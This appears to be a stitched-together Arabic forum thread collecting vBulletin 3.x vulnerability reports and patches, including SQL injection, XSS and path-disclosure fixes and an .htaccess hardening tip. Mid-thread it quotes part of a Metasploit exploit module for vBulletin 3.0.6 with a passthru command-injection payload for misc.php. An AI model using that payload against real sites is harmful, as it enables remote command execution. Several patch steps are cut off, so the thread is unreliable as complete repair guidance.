الأمس الشركة الأم vbulletin أصدرت نسختين جديدتين وهما vb3.5.2 و vb3.0.11
وذلك لإضافة بعض المميزات وترقيع الثغرات وأصدرت باتش لمن لا يريد الترقية لإغلاق الثغرات.
لأصحاب النسخ vb3.5.1 إضغط هنا
لأصحاب النسخ vb3.0.10 إضغط هنا
بدأت منذ أسبوع فتح ملفات نسخة vBulletin 3.5.0 العجيبه والتي تسعى مجموعة jelsoft أن تجعلها نسخ ثابته في الأشهر القادمه ووصلت بتطويرها حتى الان الى إصداره أسمتها Candidate 3 وهذا يعني أن النسخه ثبتت بعد إصدارات البيتا التي طرحتها منذ فتره وعلى مايبدوا أنها ستطلق النسخه الرسميه الثابته على بداية العام الجديد 2006م وأرى أن بعض الأخوان هنا بسوالف تسرع بتركيب هذه النسخه والتي لا يعلم أحد عنها سوى خاصية الـ plugins و الـ ajax .
قمت بالبحث عن الثغرات في هذه النسخه وهذا أول الخير بإذن الله
ثغره من نوع Path Disclosure ومستواها متوسط وعن طريقها يستطيع المخترق معرفة دليل الموقع موجود بأي مكان على الخادم
الثغره موجوده في ملف class_core.php وبالتحديد في سطر رقم 1365
foreach ($this->superglobal_lookup AS $arrayname)
{
$registry->superglobal_size["$arrayname"] = sizeof($GLOBALS["$arrayname"]);
foreach (array_keys($GLOBALS["$arrayname"]) AS $varname)
{
unset($GLOBALS["$varname"]); <<------
الترقيع:
1- افتح ملف class_core.php وابحث عن السطر التالي :
أخواني الأعضاء فيمعهد ترايدنت
لاحظت أن الأغلبيه يستخدم سكربتات لرفع الملفات في موقعه وهذه السكربتات كثيره منها ماهو أمن ومنها ماهو غير أمن ، وهذه السكربتات تشترط منك ياصاحب الموقع أن تقوم بعمل تصريح 777 او تصريح 707 لمجلد معين وهذه التصاريح تسمح لزوار موقعك بالكتابه في المجلد الذي قمت أنت بتصريحه.
الخطوره هنا من ملفات الـ php لأنها تحتوي على تعليمات برمجيه يتم تنفيذها داخل خادم الموقع .
فلو قام أحد الأطفال المخترقين من رفع ملف php إلى الخادم بأي ثغرة كانت فسوف يبحث عن المجلدات ذات تصريح 777 أو 707 لأن صلاحياته صلاحيات زائر وحين يجد هذه المجلدات فسوف يستخدمها كمعسكر لملفاته وسكربتاته مثل : PHPShell ، MySQLInterface ............. الخ بعدها سيصل إلى ملفات موقعك وبعدها أنت تعلم ماذا سيفعل
إذن ما الحل الصحيح لهذه المجلدات !؟!؟
الحل طبعاً بتعطيل تنفيذ الـ php داخل هذه المجلدات عن طريق تعليمه تضيفها في ملف الـ .htaccess وهي :
php_flag engine off
بعدها تقوم برفع ملف الـ .htaccess الى كل المجلدات ذات تصريح 777 .
وللتجربه قم برفع اي سكربت php للمجلدات ذات التصاريح 777 والتي تحتوي على الـ htaccess وقم بالدخول على هذا السكربت وشاهد النتيجه .
سوف تجد أن السكربت لم يقم الخادم بتنفيذه
مساء الخير للجميع وكل عام ونتم بخير وصحه وعافيه
مبارك عليكم الشهر وتقبل الله صيامكم وقيامكم
اخوتي الكرام اسعد الله ايامكم بالافراح والمسرات
لقد اكتشفت في النسخ الاخير 3.0.9 للمنتديات الفي بي ثغرة تسمح بالاختراق وتم اكتشافها
وهي عى النحو التالي :
1- يتم تسجيل العضو بالمنتدى وبعدها يتم تغيير لقبة الي مثلا ( المدير العام او المشرف العام )
ومن الغريب انه توجد لدية صلاحيات المدير العام او المشرف العام
2- اثناء تتبعي للعضو اثناء دخوله المنتدى وتغيير لقبة دون ان اقوم بتفعيل اشتراكه بالمنتدى
اصلا وجدة قد دخل عن طريق ملف user
اي معناها ان الثغرة موجودة بهذا الملف والسبب ان هذا العضو دخل المنتدى 5 مرات عن طريق هذا
الملف وباسماء مختلفه وايبي مختلف وايميل مختلف طبعا ؟
مع العلم انني مغلق جميع الثغرات ومسوي جدار ناري للمجلدات الحساسه بالمنتدى واهمها لوحه تحكم المشرف العام
كيفيه ترقيع الثغرة لاحد يسالني لاني طرحت الموضوع حتى يتم النقاش فيه وايجاد الحل المناسب
لهذه الثغرة
نرجو من لديه خلفيه عن هذه الثغره وكيفيه اغلاقها بان لايبخل علينا بالمساعدة في التخلص منها
ثغرة ملف authorize.php للبيع و الشراء و طريقة ترقيعها
هذا الملف هو ملف بيع و شراء مثل paypal و الطريقة طبعا هي حذفه نهائيا و لا توجد طريقة غيرها للآن و طبعا قم بحذفه لأنه لا يفيدك و هو موجود داخل مجلد subscriptions الموجود داخل مجلد منتداك الرئيسي و لكن إذا كنت ممن يودون استخدامه فتفضل الحل : افتح الملف و ابحث عن الكود :
$userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " . TABLE_PREFIX . "user WHERE userid = " . $item_number[1]);
و استبدله بالكود التالي :
$userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " .
TABLE_PREFIX . "user WHERE userid = " .intval( $item_number[1]));
1 - تحميل الصور
2 - تحميل الملفات
3 - تحميل الأفلام <-------- هذا ما اعتبره ضروري
ان هناك سكربتات كثير يوجد بها ثغراة
تسمح للمخترقين بالتسلل الى السيرفر
وبأمكانهم رفع الشل shll
و أخذ نسخه احتياطيه لأي سكربت كالمنتدى او المجله .... الخ
================
فأتمنى من الجميع ان يضعو هذا الهاك الذي ارفقته بداخل مجلد الصور او الملفات
حتى لا يستطيع احد اختراقه
===============
ان برمجته سهله اضفت به الداله RemoveType حتى لاتعمل فايلات الهكر او الكراك وهي تنفع لمستخدمي سيرفر ليونكس اما عن wap serv فهي على الأرجح لا تعمل
وهو عباره عن جدار حمايه لفايلات المصرحه chmod 777
كود:
##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit:hp_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";
ثغرة في الرسائل الخاصة
الاصدارات المصابة vb من 3.0 الى 3.0.7
جربت على جميع الاصدرات ونجحت الثغرة
المهم
ترقيع الثغرة
1- تغيير بملف private.php
ابحث عن
$pm['title'] = trim($pm['title']);
استبدله بـ
$pm['title'] = trim(xss_clean($pm['title']));
===============================
تركي الودعاني المصدر
ووصلتني ثغره يوم امس واضنها جديده علي وربما تكون قديمه لدى البعض منكم
واشكر الاخ الفاضل jihad حيث نبهني بوجود ثغره في المعهد وتم حذفها يوم امس
ومن هنا ارجو ممن يملكون النسخه الثالثه سواء مرخصه او منزوعه كود التبليغ
البحث في ملف private.php عن
و اعمل مشاهدة و شووف اللي يظهر لك,, :nice:
ترقيع الثغرة:
ترقيع الثغرة
1- تغيير بملف private.php
ابحث عن
$pm['title'] = trim($pm['title']);
استبدلها بى
$pm['title'] = trim(xss_clean($pm['title']));
تحية طيبة,, المصدر ميعادي ,,
+++++++++++++++++++++++
6/ شرح أخي المتميز :
بسم الله الرحمن الرحيم ..
الصلاة والسلام على نبينا محمد و على اله و صحبه اجمعين ..
اللهم لاعلم الا ماعلمتنا ...
اما بعد ..
و طبعا الاصدار 3.0.7
ياشباب تم اكتشاف ترقيع لها و تم اكتشاف الثغرة من قبل موقع سكيروتي ; هذاي الثغرة التي يستخدمها اكبر عدد من الهكر ;
والثغرة الاولى functions_search وهذاي ثغرة ماهي قويه كثير ;
والحل لها انك تنزل الملف اللي انا حاطه بالمرفقات ; تم اكتشاف الترقيع من قبل فريق S@udi virus
تم الانتهاء من هذاي الثغرة والحمد لله ;
---
نجي لثغرة خطيره جدا جدا جدا ; بالنسبه لي
misc.php = هذي الثغرة تقوم بأرسال اوامر اللينكس يعني كأنك رافع لك شل !! يعني توفر عليك و طبعا الهكر مابقو شيء مااكتشفوه اكتشفو حتى كيف تخطى السيف مود ; لا اله الا الله عليهم !!
:anger2:
وهذي الثغرة خطيره ;
والترقيع بالمرفقات
الملفات المرفقة : http://www.swalif.net/softs/attachme...chmentid=18491